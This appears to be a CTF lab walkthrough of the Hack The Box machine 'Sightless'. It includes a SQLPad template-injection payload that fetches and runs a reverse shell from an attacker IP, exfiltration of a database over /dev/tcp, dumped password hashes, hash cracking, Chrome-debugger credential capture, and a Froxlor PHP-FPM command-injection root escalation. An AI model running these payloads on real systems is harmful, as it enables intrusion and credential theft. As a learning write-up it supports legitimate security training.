Sightless

Recon

└─$ grep sight /etc/hosts
10.129.162.59   sightless.htb

HTTP (80)

In the listed services one of the link leads to sqlpad subdomain. Updated hosts.

SQLPad

SQLPad version is 6.10.0

CVE-2022-0944

https://app.opencve.io/cve/?&vendor=sqlpad&product=sqlpad https://app.opencve.io/cve/CVE-2022-0944 https://github.com/sqlpad/sqlpad/commit/3f92be386c6cd3e5eba75d85f0700d3ef54daf73 https://huntr.com/bounties/46630727-d923-4444-a421-537ecd63e7fb

As always fucking curl doesn't work, but wget works. spawn the shell.

Reverse Shell

Rev

/bin/bash -i >& /dev/tcp/10.10.14.43/4444 0>&1

Payload

{{ process.mainModule.require('child_process').exec('wget 10.10.14.43/rev -qO-|bash') }}

root@c184118df0a6:/var/lib/sqlpad# ls -alh
total 208K
drwxr-xr-x 4 root root 4.0K Sep  7 19:41 .
drwxr-xr-x 1 root root 4.0K Mar 12  2022 ..
drwxr-xr-x 2 root root 4.0K Aug  9 11:17 cache
-rw-r--r-- 1 root root  293 Sep  7 19:38 index.html
-rw-r--r-- 1 root root  293 Sep  7 19:38 index.html.1
drwxr-xr-x 2 root root 4.0K Aug  9 11:17 sessions
-rw-r--r-- 1 root root 184K Sep  7 19:41 sqlpad.sqlite
-rw-r--r-- 1 root root    0 Sep  7 19:13 t

SQLPad Database

root@c184118df0a6:/var/lib/sqlpad# cat sqlpad.sqlite | base64 > /dev/tcp/10.10.14.43/4444
---
└─$ listen > sqlpad.sqlite.base64
└─$ cat sqlpad.sqlite.base64 | base64 -d > sqlpad.sqlite

➜ .\john-1.9.0-jumbo-1-win64\run\john.exe .\hashes --wordlist=.\rockyou.txt
Warning: detected hash type "bcrypt", but the string is also recognized as "bcrypt-opencl"
Use the "--format=bcrypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
admin            (?)
1g 0:00:05:45 DONE (2024-09-08 00:07) 0.002898g/s 57.59p/s 57.59c/s 57.59C/s berna..vangogh
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Michael

root@c184118df0a6:/# wget -qO- 10.10.14.43/lp.sh | sh | tee /tmp/lp.log
...
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/perl
/usr/bin/wget
...
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ /etc/passwd is writable
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. 
...
michael:$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/:19860:0:99999:7:::
root:$6$jn8fwk6LVJ9IYw30$qwtrfWTITUro8fEJbReUc7nXyx2wwJsnYdZYm9nMQDHP8SYm33uisO9gZ20LGaepC3ch6Bb2z/lEpBM90Ra4b.:19858:0:99999:7:::
...

Nothing in the home directory, but we can try to crack the password.

➜ .\john-1.9.0-jumbo-1-win64\run\john.exe .\hashes --wordlist=.\rockyou.txt
Warning: detected hash type "sha512crypt", but the string is also recognized as "sha512crypt-opencl"
Use the "--format=sha512crypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
blindside        (?)
1g 0:00:00:24 DONE (2024-09-08 00:23) 0.04121g/s 1645p/s 1645c/s 1645C/s toutou..promo2007
Use the "--show" option to display all of the cracked passwords reliably
Session completed

root hash password is insaneclownposse

Creds: root:insaneclownposse Creds: michael:blindside

SSH

Creds: michael:insaneclownposse

User.txt

michael@sightless:~$ cat user.txt
7a77327fb60d0f9fb017e7653e96cd48

Privilege Escalation

michael@sightless:~$ curl 10.10.14.43/lp.sh|sh|tee /tmp/lp.log
...
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
...
john        1178  0.0  0.0   2892   988 ?        Ss   Sep05   0:00      _ /bin/sh -c sleep 110 && /usr/bin/python3 /home/john/automation/administration.py
john        1559  0.0  0.6  33660 24416 ?        S    Sep05   1:57          _ /usr/bin/python3 /home/john/automation/administration.py
john        1560  0.3  0.3 33630172 15068 ?      Sl   Sep05  13:06              _ /home/john/automation/chromedriver --port=36347
john        1571  0.6  2.8 34011320 114288 ?     Sl   Sep05  21:42              |   _ /opt/google/chrome/chrome --allow-pre-commit-input --disable-background-networking --disable-client-side-phishing-detection --disable-default-apps --disable-dev-shm-usage --disable-hang-monitor --disable-popup-blocking --disable-prompt-on-repost --disable-sync --enable-automation --enable-logging --headless --log-level=0 --no-first-run --no-sandbox --no-service-autorun --password-store=basic --remote-debugging-port=0 --test-type=webdriver --use-mock-keychain --user-data-dir=/tmp/.org.chromium.Chromium.PDL79u data:,
john        1577  0.0  1.4 34112452 56124 ?      S    Sep05   0:00              |       _ /opt/google/chrome/chrome --type=zygote --no-zygote-sandbox --no-sandbox --enable-logging --headless --log-level=0 --headless --crashpad-handler-pid=1573 --enable-crash-reporter
john        1593  0.3  3.2 34363116 128216 ?     Sl   Sep05  13:24              |       |   _ /opt/google/chrome/chrome --type=gpu-process --no-sandbox --disable-dev-shm-usage --headless --ozone-platform=headless --use-angle=swiftshader-webgl --headless --crashpad-handler-pid=1573 --gpu-preferences=WAAAAAAAAAAgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --shared-files --fie
john        1578  0.0  1.4 34112456 56308 ?      S    Sep05   0:00              |       _ /opt/google/chrome/chrome --type=zygote --no-sandbox --enable-logging --headless --log-level=0 --headless --crashpad-handler-pid=1573 --enable-crash-reporter
john        1623  2.9  5.9 1186800240 234540 ?   Rl   Sep05 101:39              |       |   _ /opt/google/chrome/chrome --type=renderer --headless --crashpad-handler-pid=1573 --no-sandbox --disable-dev-shm-usage --enable-automation --remote-debugging-port=0 --test-type=webdriver --allow-pre-commit-input --ozone-platform=headless --disable-gpu-compositing --lang=en-US --num-raster-threads=1 --renderer-client-id=5 --time-ticks-at-unix-epoch=-1725533755882910 --launc
john        1595  0.1  2.1 33900068 87048 ?      Sl   Sep05   4:51              |       _ /opt/google/chrome/chrome --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --disable-dev-shm-usage --use-angle=swiftshader-webgl --use-gl=angle --headless --crashpad-handler-pid=1573 --shared-files=v8_context_snapshot_data:100 --field-trial-handle=3,i,8587652901750450691,3965728681123045342,262144 --disable-features=PaintHolding --variations-seed-version --enable-logging --log-level=0 --enable-crash-reporter
root        1149  0.0  1.1 1874776 47408 ?       Ssl  Sep05   1:28 /usr/bin/containerd
...
══╣ PHP exec extensions
drwxr-xr-x 2 root root 4096 Sep  3 11:55 /etc/apache2/sites-enabled
drwxr-xr-x 2 root root 4096 Sep  3 11:55 /etc/apache2/sites-enabled
-rw-r--r-- 1 root root 770 Sep  3 11:55 /etc/apache2/sites-enabled/10_froxlor_ipandport_192.168.1.118.80.conf
<VirtualHost 192.168.1.118:80>
DocumentRoot "/var/www/html/froxlor"
 ServerName admin.sightless.htb
  <Directory "/lib/">
    <Files "userdata.inc.php">
    Require all denied
    </Files>
  </Directory>
  <DirectoryMatch "^/(bin|cache|logs|tests|vendor)/">
    Require all denied
  </DirectoryMatch>
  <FilesMatch \.(php)$>
    <If "-f %{SCRIPT_FILENAME}">
        SetHandler proxy:unix:/var/lib/apache2/fastcgi/1-froxlor.panel-admin.sightless.htb-php-fpm.socket|fcgi://localhost
    </If>
  </FilesMatch>
  <Directory "/var/www/html/froxlor/">
      CGIPassAuth On
  </Directory>
</VirtualHost>
-rw-r--r-- 1 root root 917 Sep  3 11:55 /etc/apache2/sites-enabled/34_froxlor_normal_vhost_web1.sightless.htb.conf
<VirtualHost 192.168.1.118:80>
  ServerName web1.sightless.htb
  ServerAlias *.web1.sightless.htb
  ServerAdmin john@sightless.htb
  DocumentRoot "/var/customers/webs/web1"
  <Directory "/var/customers/webs/web1/">
  <FilesMatch \.(php)$>
    <If "-f %{SCRIPT_FILENAME}">
      SetHandler proxy:unix:/var/lib/apache2/fastcgi/1-web1-web1.sightless.htb-php-fpm.socket|fcgi://localhost
    </If>
  </FilesMatch>
    CGIPassAuth On
    Require all granted
    AllowOverride All
  </Directory>
  Alias /goaccess "/var/customers/webs/web1/goaccess"
  LogLevel warn
  ErrorLog "/var/customers/logs/web1-error.log"
  CustomLog "/var/customers/logs/web1-access.log" combined
</VirtualHost>
-rw-r--r-- 1 root root 1480 Aug  2 09:05 /etc/apache2/sites-enabled/002-sqlpad.conf
<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        ServerName sqlpad.sightless.htb
        ServerAlias sqlpad.sightless.htb
        ProxyPreserveHost On
        ProxyPass         / http://127.0.0.1:3000/
        ProxyPassReverse  / http://127.0.0.1:3000/
        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
-rw-r--r-- 1 root root 264 Sep  3 11:55 /etc/apache2/sites-enabled/05_froxlor_dirfix_nofcgid.conf
  <Directory "/var/customers/webs/">
    Require all granted
    AllowOverride All
  </Directory>
lrwxrwxrwx 1 root root 35 May 15 04:27 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost 127.0.0.1:8080>
        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/html/froxlor
        ServerName admin.sightless.htb
        ServerAlias admin.sightless.htb
        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
-rw-r--r-- 1 root root 412 Sep  3 11:55 /etc/apache2/sites-enabled/40_froxlor_diroption_666d99c49b2986e75ed93e591b7eb6c8.conf
<Directory "/var/customers/webs/web1/goaccess/">
  AuthType Basic
  AuthName "Restricted Area"
  AuthUserFile /etc/apache2/froxlor-htpasswd/1-666d99c49b2986e75ed93e591b7eb6c8.htpasswd
  require valid-user
</Directory>

drwxr-xr-x 2 root root 4096 Aug  9 11:17 /etc/nginx/sites-enabled
drwxr-xr-x 2 root root 4096 Aug  9 11:17 /etc/nginx/sites-enabled
lrwxrwxrwx 1 root root 34 May 21 18:06 /etc/nginx/sites-enabled/default -> /etc/nginx/sites-available/default
server {
    listen *:80;
    server_name sightless.htb;
    location / {
        root /var/www/sightless;
        index index.html;
    }
    if ($host != sightless.htb) {
        rewrite ^ http://sightless.htb/;
    }
}
-rw-r--r-- 1 root root 249 Aug  9 07:18 /etc/nginx/sites-enabled/main
server {
        listen 80;
        server_name sqlpad.sightless.htb;
        location / {
                proxy_pass http://localhost:3000;
                proxy_set_header Host $host;
                proxy_set_header X-Real-IP $remote_addr;
                proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        }
}


-rw-r--r-- 1 root root 1414 Aug  9 07:04 /etc/apache2/sites-available/000-default.conf
<VirtualHost 127.0.0.1:8080>
        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/html/froxlor
        ServerName admin.sightless.htb
        ServerAlias admin.sightless.htb
        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
lrwxrwxrwx 1 root root 35 May 15 04:27 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost 127.0.0.1:8080>
        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/html/froxlor
        ServerName admin.sightless.htb
        ServerAlias admin.sightless.htb
        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
...
╔══════════╣ Analyzing FTP Files (limit 70)
-rw-r--r-- 1 root root 5922 May 15 04:24 /etc/vsftpd.conf
anonymous_enable=YES
local_enable
#write_enable=YES
#anon_upload_enable=YES
#anon_mkdir_write_enable=YES
#chown_uploads=YES
#chown_username=whoever
anon_root=/var/ftp/
...

Froxlor

Updating host with admin subdomain goes redirects to the main domain. Start ssh session, but with port forwarding. (Update localhost to point to admin subdomain, otherwise it fails)

└─$ ssh michael@sightless.htb -L 8000:0:8080
└─$ head -1 /etc/hosts
127.0.0.1	localhost	admin.sightless.htb

michael@sightless:~$ curl 10.10.14.43/pspy64 -so /tmp/pspy
michael@sightless:~$ chmod u+x /tmp/pspy
michael@sightless:~$ /tmp/pspy
...
2024/09/07 20:48:20 CMD: UID=0     PID=2      |
2024/09/07 20:48:20 CMD: UID=0     PID=1      | /sbin/init
2024/09/07 20:48:27 CMD: UID=1001  PID=111831 | /bin/bash /home/john/automation/healthcheck.sh
2024/09/07 20:48:27 CMD: UID=1001  PID=111832 | sleep 60
2024/09/07 20:49:27 CMD: UID=1001  PID=111845 | /bin/bash /home/john/automation/healthcheck.sh
2024/09/07 20:49:27 CMD: UID=1001  PID=111846 | /bin/bash /home/john/automation/healthcheck.sh
2024/09/07 20:50:01 CMD: UID=0     PID=111860 | /usr/sbin/CRON -f -P
2024/09/07 20:50:01 CMD: UID=0     PID=111859 | /usr/sbin/CRON -f -P
2024/09/07 20:50:01 CMD: UID=0     PID=111862 | /usr/sbin/CRON -f -P
2024/09/07 20:50:01 CMD: UID=0     PID=111863 | /usr/sbin/CRON -f -P
2024/09/07 20:50:01 CMD: UID=0     PID=111864 | /bin/sh -c /usr/bin/nice -n 5 /usr/bin/php -q /var/www/html/froxlor/bin/froxlor-cli froxlor:cron 'tasks' -q 1> /dev/null
2024/09/07 20:50:01 CMD: UID=0     PID=111865 | /bin/sh -c /root/scripts/clean_up/sqlpad/default_sqlpad.sh
2024/09/07 20:50:01 CMD: UID=0     PID=111866 | bash /root/scripts/clean_up/sqlpad/default_sqlpad.sh
2024/09/07 20:50:01 CMD: UID=0     PID=111867 | bash /root/scripts/clean_up/sqlpad/default_sqlpad.sh
2024/09/07 20:50:01 CMD: UID=0     PID=111868 |
2024/09/07 20:50:01 CMD: UID=0     PID=111869 | sh -c stty -a | grep columns
2024/09/07 20:50:01 CMD: UID=0     PID=111870 | grep columns
2024/09/07 20:50:01 CMD: UID=0     PID=111871 |
2024/09/07 20:50:01 CMD: UID=0     PID=111873 | grep columns
2024/09/07 20:50:01 CMD: UID=0     PID=111872 |
2024/09/07 20:50:01 CMD: UID=0     PID=111874 | sh -c chown -R froxlorlocal:froxlorlocal '/var/www/html/froxlor/'
2024/09/07 20:50:01 CMD: UID=0     PID=111875 | sh -c chown -R froxlorlocal:froxlorlocal '/var/www/html/froxlor/'
2024/09/07 20:50:10 CMD: UID=0     PID=111876 |
2024/09/07 20:50:27 CMD: UID=1001  PID=111882 | pgrep -f /opt/google/chrome/chrome
2024/09/07 20:50:27 CMD: UID=1001  PID=111883 | sleep 60
2024/09/07 20:51:27 CMD: UID=1001  PID=111901 | /bin/bash /home/john/automation/healthcheck.sh
2024/09/07 20:51:27 CMD: UID=1001  PID=111902 |
...

The chrome debugger is known to be vulnerable.

john        1560  0.3  0.3 33630172 15164 ?      Sl   Sep05  13:12 /home/john/automation/chromedriver --port=36347

Port forward both ports.

└─$ ssh michael@sightless.htb -L 8000:0:8080 -L 36347:0:36347

https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/chrome-remote-debugger-pentesting/

Visit chrome://inspect/#devices

The ps showed that 36347 port was used, but chrome didn't discover anything. Port forward all high ports.

└─$ ssh michael@sightless.htb -L 8000:0:8080 -L 36347:0:36347 -L 34233:0:34233 -L 33101:0:33101 -L 33060:0:33060

localhost:34233 worked.

The process logs every 5 second or so, we can observe the Network traffic and grab username/password.

Creds: admin:ForlorfroxAdmin

Admin Panel

I have been browsing for some time and it seems like from admin I went to web1

Traffic > Customers > Table > web1 --> We become web1

As web1 we can change password on FTP without previous one.

FTP

ftp command fails because of SSL, use lftp

└─$ lftp web1@sightless.htb
lftp web1@sightless.htb:~> ls
ls: Fatal error: Certificate verification: The certificate is NOT trusted. The certificate issuer is unknown.  (A1:4B:95:93:0A:CF:15:CD:DD:52:68:ED:DB:5B:92:ED:F0:F3:3C:69)

lftp web1@sightless.htb:~> set ssl:verify-certificate no
lftp web1@sightless.htb:/> ls -alhR
drwxr-x---   3 web1     web1         4.0k Aug  2 07:02 .
drwxr-x---   3 web1     web1         4.0k Aug  2 07:02 ..
drwxr-xr-x   3 web1     web1         4.0k May 17 03:17 goaccess
-rw-r--r--   1 web1     web1         8.2k Mar 29 10:29 index.html

goaccess:
drwxr-xr-x   3 web1     web1         4.0k May 17 03:17 .
drwxr-x---   3 web1     web1         4.0k Aug  2 07:02 ..
drwxr-xr-x   2 web1     web1         4.0k Aug  2 07:14 backup

goaccess/backup:
drwxr-xr-x   2 web1     web1         4.0k Aug  2 07:14 .
drwxr-xr-x   3 web1     web1         4.0k May 17 03:17 ..
-rw-r--r--   1 web1     web1         5.2k Aug  6 14:29 Database.kdb
lftp web1@sightless.htb:/> get goaccess/backup/Database.kdb

KeePass

└─$ file Database.kdb
Database.kdb: Keepass password database 1.x KDB, 8 groups, 4 entries, 600000 key transformation rounds
└─$ keepass2john Database.kdb > Database.hash
Inlining Database.kdb
└─$ cat Database.hash | clip
---
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe .\hashes --wordlist=.\rockyou.txt
Warning: detected hash type "KeePass", but the string is also recognized as "KeePass-opencl"
Use the "--format=KeePass-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 600000 for all loaded hashes
Cost 2 (version) is 1 for all loaded hashes
Cost 3 (algorithm [0=AES, 1=TwoFish, 2=ChaCha]) is 0 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bulldogs         (Database.kdb)
1g 0:00:01:53 DONE (2024-09-08 02:10) 0.008845g/s 9.341p/s 9.341c/s 9.341C/s kucing..stars
Use the "--show" option to display all of the cracked passwords reliably
Session completed

https://keepassxc.org

Root

Creds: root:q6gnLTB74L132TMdFCpK

ssh didn't like the downloaded key and kept giving crypto errors. Solution: https://unix.stackexchange.com/a/734936

└─$ chmod 600 id_rsa
└─$ dos2unix id_rsa
dos2unix: converting file id_rsa to Unix format...
└─$ ssh root@10.129.162.59 -i id_rsa
Last login: Tue Sep  3 08:18:45 2024
root@sightless:~# id
uid=0(root) gid=0(root) groups=0(root)

Root.txt

root@sightless:~# cat root.txt
c231fb47d333b24c759af588af96dc18

Unintended steps (?)

that is the LFI code, you have to use suppress_origin=True in the ws connection and you can do some LFIhttps://gist.github.com/pich4ya/5e7d3d172bb4c03360112fd270045e05

and

Go to PHP > PHP-FPM versions and create a new PHP-FPM version.
In the PHP-FPM restart command field, enter:

chmod 4000 /bin/bash

Save the changes.
Go to http://127.0.0.1:8080/admin_settings.php?start=phpfpm, disable PHP-FPM, and save. Then, re-enable PHP-FPM and save. This will execute the chmod command.
After this, from Michael’s account, execute:

/bin/bash -p

This will give you a bash shell with root privileges.
If it doesn’t work immediately, repeat the process until it takes effect.

# Note: From the chatter this may take up to 4-5minutes (?)

and

sarperavci > Disclosing Froxlor V2.x Authenticated RCE as Root Vulnerability via PHP-FPM ??

PreviousSea NextTrickster

Last updated 7 months ago

hashtagRecon

hashtagHTTP (80)

hashtagSQLPad

hashtagCVE-2022-0944

hashtagReverse Shell

hashtagSQLPad Database

hashtagMichael

hashtagSSH

hashtagUser.txt

hashtagPrivilege Escalation

hashtagFroxlor

hashtagAdmin Panel

hashtagFTP

hashtagKeePass

hashtagRoot

hashtagRoot.txt

hashtagUnintended steps (?)